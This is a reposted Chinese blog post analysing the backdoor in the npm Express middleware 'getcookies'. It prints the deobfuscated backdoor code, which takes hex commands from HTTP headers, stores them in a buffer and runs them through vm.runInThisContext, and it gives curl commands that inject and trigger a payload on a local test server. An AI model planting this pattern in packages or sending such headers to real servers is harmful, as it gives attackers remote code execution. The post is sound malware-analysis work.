美文网首页
Express 中间件 getcookies 后门代码分析

Express 中间件 getcookies 后门代码分析

作者: zhoukeke | 来源:发表于2018-05-30 09:47 被阅读0次

    前段时间 Express 中的一个中间件 getcookies 被爆出存在 backdoor,关注了一波,但仅看官方npm 的解释,一时半会儿没想明白黑客是怎么留的后门,一直困扰着我。今天有空仔细看了一下,了解了黑客具体的作案手段。文中的代码可以在 drafts/getcookies 中查找。

    原文链接

    后门代码分析

    这个后门代码找得也不容易,因为在被爆出后门后,npm 团队第一时间就删除下架了,github 上的仓库也没找到,不过不负有心人,在 npm.runkit 中找到了后门源码。

    • 黑客巧妙地把 backdoor 代码伪装成测试代码放在 test 目录中,并在 index.js “不经意” 引入了测试代码
    • 主要的 require('vm')['runInThisContext'] 代码被编码故意伪装了一下
    • 全程使用 16 进制,让不想细看的人以为是测试代码
    // 分配一块 64K 的内存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);

// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
    // 以 0xfffe 命令为样例
    // 将字符串 feff 读入 Buffer
    // 'feff' => <Buffer fe ff>
    // readUInt16LE 读取 16 bit(位) 并以 byte(字节) 反向排序
    // <Buffer fe ff> => 0xfffe
    //
    // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
    // true
    // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
    // '90785634'
    p = Buffer.from(p, 'hex').readUInt16LE(0);
    switch (p) {

        case 0xfffe:
            module.exports.log = Buffer.alloc(0xffff);
            return;
        case 0xfffa:
            return setTimeout(() => {

                // 去除末尾的 0x00
                let c = module.exports.log.toString().replace(/\x00*$/, '');
                module.exports.log = Buffer.alloc(0xffff);

                // 不能以 0x00 开头
                if (c.indexOf('\x00') < 0) {
                    // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                    // 代码必须是个函数
                    require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                }
                next();
            }, 1000);
        default:
            // 我们以 (function(){console.log('hack')}) 为例
            v = Buffer.from(v, 'hex');
            for (let i = 0; i < v.length; i++) {

                // 因为执行命令的时候,不能以 0x00 开头
                // 所以,p 必须是 0x0000
                module.exports.log[p + i] = v[i];
            }
    }
});

    测试一下后门

    写一个 express 应用,并将中间件引入进来

    var express = require('express')
var app = express()

var getcookies = require('..');

app.use(getcookies);
app.get('/', function (req, res) {
  res.send('Hello World')
})

app.listen(3000)

    启动并执行我们的后门代码

    $ node demo/index.js
// 向服务器注入 16 进制代码 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
// 向服务器发送执行命令
$ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000

    注意,中途出现的 hack 就是被注入代码的输出。

    image

    References

    相关文章

      网友评论

          本文标题:Express 中间件 getcookies 后门代码分析

          本文链接:https://www.haomeiwen.com/subject/hkctsftx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|Express 中间件 getcookies 后门代码分析|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!